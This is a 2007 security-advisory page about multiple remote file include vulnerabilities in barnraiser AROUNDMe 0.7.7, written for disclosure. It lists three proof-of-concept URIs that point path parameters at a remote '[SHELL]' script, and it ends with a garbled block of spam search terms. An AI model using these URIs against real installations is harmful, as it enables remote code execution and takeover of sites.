about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , AroundMe Multiple Remote File Include Vulnerabilities


Title AroundMe Multiple Remote File Include Vulnerabilities
Published 2007-04-04-12:00AM
Updated 2007-04-05-05:12PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  kezzap66345 is credited with the discovery of these vulnerabilities.
Vulnerable  barnraiser AROUNDMe 0.7.7
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]
http://www.example.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
http://www.example.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 18:04:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
vsftpd 2.0 tatamotors repevideo www.xvidio Lorna Morg Windows XP www.sexmov news for c photosexy songs for z...uk.htm www.doodwa Wwwshakela web-client funny-game Sex lades www.doodwa BCOM 3rd y Axis sexocea news for c Www.Sex bd pic sex ar maxcpm.inf sentinel p 200 ///ind pic sex ar Bear attac hot sexy g Desikama.c PHP-CGI+0. Www.porn.r danny phan Trend Www.naruto Sexy imaga metaadmin/ NEWS EXPLO news for c Sexy sania sexy vidio horse mati Crack Data www.zhibei www-worlds venessa hu 200 /compo nanga www.world. INVISION